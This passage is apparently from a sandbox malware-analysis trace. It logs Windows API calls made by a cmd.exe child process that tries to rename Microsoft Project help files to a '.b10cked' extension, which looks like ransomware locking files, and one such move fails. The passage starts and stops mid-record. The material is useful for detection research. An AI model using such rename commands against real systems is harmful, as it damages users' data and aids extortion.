(penv=0x330180) returned 1 [0204.337] GetEnvironmentStringsW () returned 0x330180* [0204.337] FreeEnvironmentStringsW (penv=0x330180) returned 1 [0204.337] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ec7c | out: phkResult=0x18ec7c*=0x40) returned 0x0 [0204.337] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ec84, lpData=0x18ec88, lpcbData=0x18ec80*=0x1000 | out: lpType=0x18ec84*=0x0, lpData=0x18ec88*=0xa8, lpcbData=0x18ec80*=0x1000) returned 0x2 [0204.337] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ec84, lpData=0x18ec88, lpcbData=0x18ec80*=0x1000 | out: lpType=0x18ec84*=0x4, lpData=0x18ec88*=0x1, lpcbData=0x18ec80*=0x4) returned 0x0 [0204.337] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ec84, lpData=0x18ec88, lpcbData=0x18ec80*=0x1000 | out: lpType=0x18ec84*=0x0, lpData=0x18ec88*=0x1, lpcbData=0x18ec80*=0x1000) returned 0x2 [0204.337] 
RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ec84, lpData=0x18ec88, lpcbData=0x18ec80*=0x1000 | out: lpType=0x18ec84*=0x4, lpData=0x18ec88*=0x0, lpcbData=0x18ec80*=0x4) returned 0x0 [0204.337] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ec84, lpData=0x18ec88, lpcbData=0x18ec80*=0x1000 | out: lpType=0x18ec84*=0x4, lpData=0x18ec88*=0x40, lpcbData=0x18ec80*=0x4) returned 0x0 [0204.337] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ec84, lpData=0x18ec88, lpcbData=0x18ec80*=0x1000 | out: lpType=0x18ec84*=0x4, lpData=0x18ec88*=0x40, lpcbData=0x18ec80*=0x4) returned 0x0 [0204.337] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ec84, lpData=0x18ec88, lpcbData=0x18ec80*=0x1000 | out: lpType=0x18ec84*=0x0, lpData=0x18ec88*=0x40, lpcbData=0x18ec80*=0x1000) returned 0x2 [0204.337] RegCloseKey (hKey=0x40) returned 0x0 [0204.337] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ec7c | out: phkResult=0x18ec7c*=0x40) returned 0x0 [0204.337] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ec84, lpData=0x18ec88, lpcbData=0x18ec80*=0x1000 | out: lpType=0x18ec84*=0x0, lpData=0x18ec88*=0x40, lpcbData=0x18ec80*=0x1000) returned 0x2 [0204.337] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ec84, lpData=0x18ec88, lpcbData=0x18ec80*=0x1000 | out: lpType=0x18ec84*=0x4, lpData=0x18ec88*=0x1, lpcbData=0x18ec80*=0x4) returned 0x0 [0204.337] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ec84, lpData=0x18ec88, lpcbData=0x18ec80*=0x1000 | out: lpType=0x18ec84*=0x0, lpData=0x18ec88*=0x1, lpcbData=0x18ec80*=0x1000) returned 0x2 [0204.337] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", 
lpReserved=0x0, lpType=0x18ec84, lpData=0x18ec88, lpcbData=0x18ec80*=0x1000 | out: lpType=0x18ec84*=0x4, lpData=0x18ec88*=0x0, lpcbData=0x18ec80*=0x4) returned 0x0 [0204.337] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ec84, lpData=0x18ec88, lpcbData=0x18ec80*=0x1000 | out: lpType=0x18ec84*=0x4, lpData=0x18ec88*=0x9, lpcbData=0x18ec80*=0x4) returned 0x0 [0204.337] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ec84, lpData=0x18ec88, lpcbData=0x18ec80*=0x1000 | out: lpType=0x18ec84*=0x4, lpData=0x18ec88*=0x9, lpcbData=0x18ec80*=0x4) returned 0x0 [0204.337] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ec84, lpData=0x18ec88, lpcbData=0x18ec80*=0x1000 | out: lpType=0x18ec84*=0x0, lpData=0x18ec88*=0x9, lpcbData=0x18ec80*=0x1000) returned 0x2 [0204.337] RegCloseKey (hKey=0x40) returned 0x0 [0204.338] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a6 [0204.338] srand (_Seed=0x5b8863a6) [0204.338] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.14.1033.hxn.b10cked\"" [0204.338] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.14.1033.hxn.b10cked\"" [0204.338] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.338] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3318e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0204.338] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 
[0204.338] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0204.338] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0204.338] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0204.338] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0204.338] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0204.339] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0204.339] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0204.339] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0204.339] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0204.339] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0204.339] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0204.339] GetEnvironmentStringsW () returned 0x3322d0* [0204.339] FreeEnvironmentStringsW (penv=0x3322d0) returned 1 [0204.339] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.339] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0204.339] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0204.339] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0204.339] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0204.339] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0204.339] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0204.339] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0204.339] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0204.339] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0204.339] GetCurrentDirectoryW (in: nBufferLength=0x104, 
lpBuffer=0x18fa48 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.339] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18fa48, lpFilePart=0x18fa44 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18fa44*="Desktop") returned 0x18 [0204.339] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0204.339] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f7c4 | out: lpFindFileData=0x18f7c4) returned 0x330010 [0204.340] FindClose (in: hFindFile=0x330010 | out: hFindFile=0x330010) returned 1 [0204.340] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f7c4 | out: lpFindFileData=0x18f7c4) returned 0x330010 [0204.340] FindClose (in: hFindFile=0x330010 | out: hFindFile=0x330010) returned 1 [0204.340] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f7c4 | out: lpFindFileData=0x18f7c4) returned 0x330010 [0204.340] FindClose (in: hFindFile=0x330010 | out: hFindFile=0x330010) returned 1 [0204.340] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0204.340] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0204.340] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0204.340] GetEnvironmentStringsW () returned 0x332af0* [0204.340] FreeEnvironmentStringsW (penv=0x332af0) returned 1 [0204.340] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.341] GetConsoleOutputCP () returned 0x1b5 [0204.341] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0204.341] GetUserDefaultLCID () returned 0x409 [0204.341] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, 
cchData=8 | out: lpLCData=":") returned 2 [0204.341] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18fb88, cchData=128 | out: lpLCData="0") returned 2 [0204.341] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18fb88, cchData=128 | out: lpLCData="0") returned 2 [0204.341] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18fb88, cchData=128 | out: lpLCData="1") returned 2 [0204.342] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0204.342] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0204.342] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0204.342] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0204.342] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0204.342] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0204.342] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0204.342] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0204.342] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0204.342] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0204.342] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0204.343] GetConsoleTitleW (in: lpConsoleTitle=0x3208e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.343] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0204.343] GetProcAddress (hModule=0x76910000, 
lpProcName="CopyFileExW") returned 0x7694ac6c [0204.343] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0204.343] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0204.344] _wcsicmp (_String1="move", _String2=")") returned 68 [0204.344] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0204.344] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0204.344] _wcsicmp (_String1="IF", _String2="move") returned -4 [0204.344] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0204.344] _wcsicmp (_String1="REM", _String2="move") returned 5 [0204.344] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0204.346] GetConsoleTitleW (in: lpConsoleTitle=0x18f880, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.347] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0204.347] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0204.347] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0204.347] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0204.347] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0204.347] _wcsicmp (_String1="move", _String2="CD") returned 10 [0204.347] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0204.347] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0204.347] _wcsicmp (_String1="move", _String2="REN") returned -5 [0204.347] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0204.347] _wcsicmp (_String1="move", _String2="SET") returned -6 [0204.347] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0204.347] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0204.347] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0204.347] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0204.347] _wcsicmp (_String1="move", _String2="MD") returned 11 [0204.347] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0204.347] 
_wcsicmp (_String1="move", _String2="RD") returned -5 [0204.347] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0204.347] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0204.347] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0204.347] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0204.347] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0204.347] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0204.347] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0204.347] _wcsicmp (_String1="move", _String2="VER") returned -9 [0204.347] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0204.347] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0204.347] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0204.347] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0204.347] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0204.347] _wcsicmp (_String1="move", _String2="START") returned -6 [0204.347] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0204.347] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0204.347] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0204.349] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.349] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.349] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f63c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f634, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f634*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0204.349] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0204.349] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0204.349] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) 
returned 2 [0204.349] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0204.349] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0204.349] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0204.349] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0204.349] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0204.349] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0204.349] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0204.349] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0204.350] 
_wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0204.350] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0204.350] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0204.350] _wcsicmp (_String1="MSWINP~1.HXN", _String2=".") returned 63 [0204.350] _wcsicmp (_String1="MSWINP~1.HXN", _String2="..") returned 63 [0204.350] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mswinp~1.hxn")) returned 0x2022 [0204.351] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x331e40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.351] SetErrorMode (uMode=0x0) returned 0x0 [0204.351] SetErrorMode (uMode=0x1) returned 0x0 [0204.351] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN", nBufferLength=0x104, lpBuffer=0x18efc4, lpFilePart=0x18efac | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN", lpFilePart=0x18efac*="MSWINP~1.HXN") returned 0x27 [0204.351] SetErrorMode (uMode=0x0) returned 0x1 [0204.351] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0204.351] _wcsicmp (_String1="MSWINP~1.HXN", _String2=".") returned 63 [0204.351] _wcsicmp (_String1="MSWINP~1.HXN", _String2="..") returned 63 [0204.351] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mswinp~1.hxn")) returned 
0x2022 [0204.351] SetErrorMode (uMode=0x0) returned 0x0 [0204.351] SetErrorMode (uMode=0x1) returned 0x0 [0204.351] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN", nBufferLength=0x104, lpBuffer=0x18f440, lpFilePart=0x18f1d8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN", lpFilePart=0x18f1d8*="MSWINP~1.HXN") returned 0x27 [0204.351] SetErrorMode (uMode=0x0) returned 0x1 [0204.351] SetErrorMode (uMode=0x0) returned 0x0 [0204.352] SetErrorMode (uMode=0x1) returned 0x0 [0204.352] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x18f648, lpFilePart=0x18f1d8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.14.1033.hxn.b10cked", lpFilePart=0x18f1d8*="MS.WINPROJ.14.1033.hxn.b10cked") returned 0x39 [0204.352] SetErrorMode (uMode=0x0) returned 0x1 [0204.352] SetLastError (dwErrCode=0x0) [0204.352] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.winproj.14.1033.hxn.b10cked")) returned 0xffffffff [0204.352] GetLastError () returned 0x2 [0204.352] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x18eb54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb54) returned 0x320e70 [0204.352] FindNextFileW (in: hFindFile=0x320e70, lpFindFileData=0x18eb54 | out: lpFindFileData=0x18eb54) returned 0 [0204.352] FindClose (in: hFindFile=0x320e70 | out: hFindFile=0x320e70) returned 1 [0204.353] GetLastError () returned 0x12 [0204.353] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x18eb54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb54) returned 0x320e70 [0204.353] FindNextFileW (in: hFindFile=0x320e70, lpFindFileData=0x18eb54 | out: lpFindFileData=0x18eb54) 
returned 0 [0204.353] FindClose (in: hFindFile=0x320e70 | out: hFindFile=0x320e70) returned 1 [0204.353] GetLastError () returned 0x12 [0204.917] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x331be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x331be0) returned 0x320e70 [0204.917] FindNextFileW (in: hFindFile=0x320e70, lpFindFileData=0x331be0 | out: lpFindFileData=0x331be0) returned 0 [0204.917] FindClose (in: hFindFile=0x320e70 | out: hFindFile=0x320e70) returned 1 [0204.917] GetLastError () returned 0x12 [0204.917] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x331be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x331be0) returned 0x320e70 [0204.917] FindNextFileW (in: hFindFile=0x320e70, lpFindFileData=0x331be0 | out: lpFindFileData=0x331be0) returned 0 [0204.917] FindClose (in: hFindFile=0x320e70 | out: hFindFile=0x320e70) returned 1 [0204.917] GetLastError () returned 0x12 [0204.918] _get_osfhandle (_FileHandle=2) returned 0xb [0204.918] GetFileType (hFile=0xb) returned 0x2 [0204.918] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0204.918] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18ed24 | out: lpMode=0x18ed24) returned 1 [0204.918] _get_osfhandle (_FileHandle=2) returned 0xb [0204.918] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x18ed58 | out: lpConsoleScreenBufferInfo=0x18ed58) returned 1 [0204.918] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0204.919] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18ed98 | out: lpBuffer="The system cannot find the file 
specified.\r\n") returned 0x2c [0204.920] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x18ed7c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18ed7c*=0x2c) returned 1 [0204.920] longjmp () [0204.920] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.920] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0204.920] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.920] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0204.920] _get_osfhandle (_FileHandle=0) returned 0x3 [0204.921] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0204.921] SetConsoleInputExeNameW () returned 0x1 [0204.921] GetConsoleOutputCP () returned 0x1b5 [0204.921] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0204.921] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.921] exit (_Code=1) Process: id = "483" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16640" os_pid = "0xc84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.DEV.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29441 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = 
